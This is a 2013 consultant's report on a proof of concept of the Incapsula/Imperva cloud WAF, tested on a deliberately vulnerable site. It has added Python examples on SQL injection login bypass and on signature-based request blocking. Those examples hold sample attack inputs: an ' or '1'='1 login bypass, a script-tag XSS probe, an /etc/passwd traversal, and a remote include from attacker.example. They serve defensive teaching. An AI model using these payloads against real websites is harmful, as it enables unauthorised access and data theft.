INCAPSULA / IMPERVA
CLOUD WAF POC
&
RESEARCH REPORT
Michael Kaishar | Security Consultant
April, 2013: Version 1.0
Incapsula / Imperva Cloud WAF POC & Research Report - version 1.0
April 2013
2
Table of Contents
Introduction .................................................................................................. 3
POC Objective ......................................................................................................... 3
POC Design ............................................................................................................. 3
POC Limitations ....................................................................................................... 3
POC High Level Solution Architecture ................................................................ 4
Traditional Firewall Configuration ............................................................................... 4
Incapsula/Imperva Cloud WAF Configuration ............................................................... 4
POC Implementation ...................................................................................... 5
Configuring the Cloud WAF to Ignore Malicious Traffic .................................................. 5
Set up and Configuration of the Cloud WAF Managed Service Solution ............................ 7
Demonstrating website protection using the Cloud WAF .............................................. 11
Additional Features and Benefits .............................................................................. 12
Conclusion .................................................................................................. 13
Introduction
Being connected to the Internet and maintaining a web presence in order to conduct business carries
real risk, because web attacks are a constant threat to any organization. Realistically, given
today’s emerging threats, how can organizations maintain and protect their websites from hackers,
malicious bots, scrapers, comment spammers, and denial of service attacks, while at the same time
allowing legitimate traffic to pass through and complying with regulatory mandates?
There are numerous solutions, but the smartest, fastest, and easiest is to deploy a Web
Application Firewall as a security measure. The following research report documents the results and
recommendations for the Cloud Web Application Firewall (WAF) Managed Service provided by
Incapsula/Imperva.
POC Objective
The aim of this POC is to illustrate the functionality of the Incapsula/Imperva Cloud WAF Managed
Service and to provide sufficient information to determine whether the
Incapsula/Imperva Cloud WAF Managed Service is a viable security solution.
POC Design
The Team has created an intentionally vulnerable website running in the
environment. The website URL is: The idea is to implement the
Incapsula/Imperva Cloud WAF Managed Service and to illustrate the successful protection of the
vulnerable website without fixing any of the application code. The POC demonstrates a before and after
situation: at first the website is unprotected, and later it is protected by the
Incapsula/Imperva Cloud WAF Managed Service.
POC Limitations
Organizations should, as a rule, follow industry best practices in securing all devices and applications.
The scope of this research is limited to a high-level technical implementation, evaluation, and
demonstration of the Incapsula/Imperva Cloud WAF Managed Service and does not attempt to offer
detailed or in-depth guidance on network security or secure coding practices.
POC High Level Solution Architecture
Traditional Firewall Configuration
Figure 1 illustrates a typical network architecture in which a traditional firewall is configured as the
security measure. Traditional firewalls are not capable of preventing malicious HTTP(S)-level attacks
such as SQL Injection, Cross-Site Scripting, Cross-Site Request Forgery, Illegal Resource Access, and
Remote File Inclusion, because they filter on addresses and ports rather than on the content of the
request. The is an intentionally vulnerable web application for
the purposes of this POC. The traditional firewall will not block any of these malicious HTTP(S) requests.
Examples of some of these HTTP(S)-level attacks are demonstrated later in this report.
Figure 1: Traditional Firewall Configuration
Incapsula/Imperva Cloud WAF Configuration
Figure 2 illustrates the addition of the Incapsula/Imperva Cloud WAF Managed Service. All traffic
flows through the Incapsula/Imperva Cloud WAF: malicious traffic is detected and blocked, while
legitimate traffic is passed through to the client. The cloud WAF is implemented
through a DNS change. Instead of resolving directly to the original IP address of the website, the
domain’s DNS records are changed to point to the cloud WAF IP address.
Figure 2: Incapsula/Imperva Cloud WAF Configuration
POC Implementation
Configuring the Cloud WAF to Ignore Malicious Traffic
The following is a demonstration of malicious attacks that hackers might use. These attacks are for
demonstration purposes only and were carried out against the test website
In order to simulate the absence of the cloud WAF Managed
Solution, the cloud WAF was configured to ignore malicious traffic. This was done in order to illustrate
what a successful attack looks like. The Appendix section of this report defines cross-site scripting and
SQL injection attacks.
Figure 3 illustrates a successful cross-site scripting attack that was not blocked, both because
the web application is vulnerable to such attacks and because the cloud WAF, in its ‘simulated’
absence, did not block the malicious request. This is a simple, basic probe that a hacker would use
to test whether a site is vulnerable.
Figure 3: Successful cross-site scripting attack
Figure 4 illustrates a very simple SQL injection attack using ' or '1'='1 to log in to the
site successfully without creating any account, thereby bypassing the application’s login requirements.
Figure 4: Successful SQL Injection attack
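The POC deliberately protects the site without touching its code, but it is worth seeing why the payload in Figure 4 works at all. The following example is added here; it is not code from the POC site or from Incapsula/Imperva. It builds a one-row users table in an in-memory SQLite database (the account name and password are constructed for the example) and compares a login query assembled by string concatenation, as the vulnerable site presumably does it, with a parameterised query that the same payload cannot influence. The function names make_db, login_vulnerable, login_fixed and demo are mine.

```python
import sqlite3

# Constructed sample account for the demonstration (not from the POC site).
USERS = [("alice", "s3cret-example")]

PAYLOAD = "' or '1'='1"  # the string the report shows in Figure 4


def make_db():
    """Create an in-memory SQLite database with one user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Login the way the vulnerable site does it: the submitted values are
    spliced into the SQL text, so a quote in the input rewrites the query.
    With the payload the WHERE clause becomes
        username = 'anyone' AND password = '' or '1'='1'
    and the trailing OR is true for every row."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_fixed(conn, username, password):
    """Parameterised login: the values travel separately from the SQL text,
    so the database only ever compares them as plain strings."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def demo():
    """Return ((vulnerable, fixed) with the payload, (vulnerable, fixed) with valid credentials)."""
    conn = make_db()
    bypass = (login_vulnerable(conn, "anyone", PAYLOAD),
              login_fixed(conn, "anyone", PAYLOAD))
    valid = (login_vulnerable(conn, "alice", "s3cret-example"),
             login_fixed(conn, "alice", "s3cret-example"))
    return bypass, valid


if __name__ == "__main__":
    bypass, valid = demo()
    print("payload against concatenated query:", bypass[0])   # True: logged in with no account
    print("payload against parameterised query:", bypass[1])  # False
    print("valid credentials:", valid)                          # (True, True)
```

The WAF in this POC blocks such a request before it reaches the application; the parameterised query is the code-level fix that would make the application safe even if a request were to get past the WAF, which is why the two are complementary rather than alternatives.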
Set up and Configuration of the Cloud WAF Managed Service Solution
Setting up and configuring the Incapsula/Imperva Cloud WAF Managed Service is extremely easy and
straightforward.
1. Sign up at https://my.incapsula.com/sign-up. Once registration is completed, an email is
sent to the email address used during the registration process.
2. Once registered and validated, browse to https://my.incapsula.com and enter the username
and password to sign in to the service.
3. Now it’s time to activate the Incapsula/Imperva Cloud WAF by adding a domain address to be
protected and clicking NEXT>. In this case the domain has already
been added and configured.
4. Once a website is added it goes through an automatic configuration process as illustrated.
5. Once the automated process is completed, a simple change to the domain’s DNS records must
be made in order to point the website to the Incapsula/Imperva Cloud WAF Managed
Service. Step-by-step instructions are sent out on how to complete this task. The DNS
transition phase can take up to several hours. Once the DNS changes take effect, an email
notification is sent out.
6. The image below illustrates that the DNS changes have taken effect.
7. The image below illustrates the current as being effectively
protected by the Incapsula/Imperva Cloud WAF Managed Service.
8. Configuring the Cloud WAF is simple. Choose Block Request for each of the attack categories.
Demonstrating website protection using the Cloud WAF
Previously it was demonstrated that the website was successfully
attacked and compromised using very simple cross-site scripting and SQL injection attack methods
without having the Incapsula/Imperva Cloud WAF Managed Service protecting the site.
Figure 5 illustrates that the Incapsula/Imperva Cloud WAF has successfully protected the
website from a cross-site scripting attack. In addition, an email alert
is sent to the parties configured to receive the notifications.
Figure 5: Unsuccessful cross-site scripting attack
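To make concrete what the Block Request setting from step 8 and the alert in Figure 5 amount to, here is an added example of the decision a request-inspecting WAF makes, written by the editor and not taken from Incapsula/Imperva. It parses a handful of constructed request records (client address, method, target and optional form body; none are from the POC environment), decodes the percent-encoding an attacker would typically use, matches each parameter against illustrative signatures for the attack classes the report names, and renders the blocked requests as alert lines in the spirit of the email notification. The signature patterns, the record format and the names SIGNATURES, SAMPLE_REQUESTS, inspect, run and alert_lines are all assumptions of this example; a commercial WAF uses much richer rules and normalisation, and patterns this simple will raise false positives on real traffic.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Illustrative signatures for the attack classes named in the report. They are
# deliberately simple (and will produce false positives on real traffic); a
# commercial WAF uses far richer rule sets and normalisation.
SIGNATURES = {
    "Cross-Site Scripting": re.compile(r"<\s*script|on\w+\s*=|javascript:", re.I),
    "SQL Injection": re.compile(r"'\s*or\s*'?\d*'?\s*=\s*'?\d|union\s+select", re.I),
    "Illegal Resource Access": re.compile(r"(^|/)\.\.(/|$)|/etc/passwd", re.I),
    "Remote File Inclusion": re.compile(r"^\s*(https?|ftp)://", re.I),
}

# Constructed request records: "<client ip> <method> <target> [<form body>]".
# None of these come from the POC environment.
SAMPLE_REQUESTS = [
    "203.0.113.5 GET /index.php?page=home",
    "203.0.113.7 GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E",
    "203.0.113.9 POST /login.php username=guest&password=%27+or+%271%27%3D%271",
    "203.0.113.11 GET /download.php?file=../../etc/passwd",
    "203.0.113.13 GET /index.php?page=http://attacker.example/shell.txt",
]


def inspect(record):
    """Decide Allow or Block Request for one record and report the matched class."""
    parts = record.split(" ", 3)
    client, method, target = parts[0], parts[1], parts[2]
    body = parts[3] if len(parts) == 4 else ""
    url = urlsplit(target)
    # Decode percent-encoding before matching; otherwise %3Cscript%3E slips past.
    fields = [("path", unquote_plus(url.path))]
    fields += parse_qsl(url.query, keep_blank_values=True)
    fields += parse_qsl(body, keep_blank_values=True)
    for name, value in fields:
        for attack, pattern in SIGNATURES.items():
            if pattern.search(value):
                return {"client": client, "method": method, "path": url.path,
                        "action": "Block Request", "attack": attack,
                        "parameter": name, "evidence": value[:60]}
    return {"client": client, "method": method, "path": url.path,
            "action": "Allow", "attack": None, "parameter": None, "evidence": None}


def run(records):
    """Inspect every record and return the list of decisions in order."""
    return [inspect(r) for r in records]


def alert_lines(decisions):
    """Render blocked requests as the kind of summary an email alert would carry."""
    return ["ALERT {attack}: {method} {path} from {client} blocked "
            "(parameter '{parameter}': {evidence!r})".format(**d)
            for d in decisions if d["action"] == "Block Request"]


if __name__ == "__main__":
    for line in alert_lines(run(SAMPLE_REQUESTS)):
        print(line)
```

Two points a practitioner should take from the example: decoding must happen before matching, or the encoded script tag in the second record passes unnoticed; and the decision is made on the request alone, which is exactly why the vulnerable site in this POC can be protected without touching its code, and equally why the protection depends on every request actually traversing the WAF.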
Additional Features and Benefits
There are many more features to the Incapsula/Imperva Cloud WAF Managed Service offering in
addition to the protection from SQL Injection, Cross-Site Scripting, and Illegal Resource Access. The
additional features include the following:
• Backdoor Protect (currently in beta): detects and quarantines backdoors
uploaded to a protected website.
• DDoS Mitigation: Used to detect and stop distributed denial of service attacks on a
protected website.
• PCI 6.6 Compliance: According to Incapsula/Imperva “the PCI DSS offers two alternatives
for meeting requirement 6.6. Either Install a WAF in front of your website or perform an
application code review. For most merchants, application code reviews are costly, impractical
and therefore out of the question. A WAF is clearly preferable, but traditional WAF solutions
require in-depth IT and security knowledge and resources that not all companies have.”
• Website Performance Enhancement: According to Incapsula/Imperva “on average,
websites using Incapsula are 40% faster and consume 50% less bandwidth.”
• Analytics and Monitoring: Real time analytics for website traffic, performance and threats.
Conclusion
The Incapsula/Imperva Cloud WAF Managed Service offers an easy and robust solution for protecting
websites. In addition to its ease of use and well-designed dashboard, the solution also provides a
powerful reporting feature that gives detailed information as well as attack analytics. Although the
testing and evaluation for this POC was carried out at a high level, the Incapsula/Imperva Cloud WAF
Managed Service solution would be a welcome addition to the The
Incapsula/Imperva Cloud WAF solution is a great product.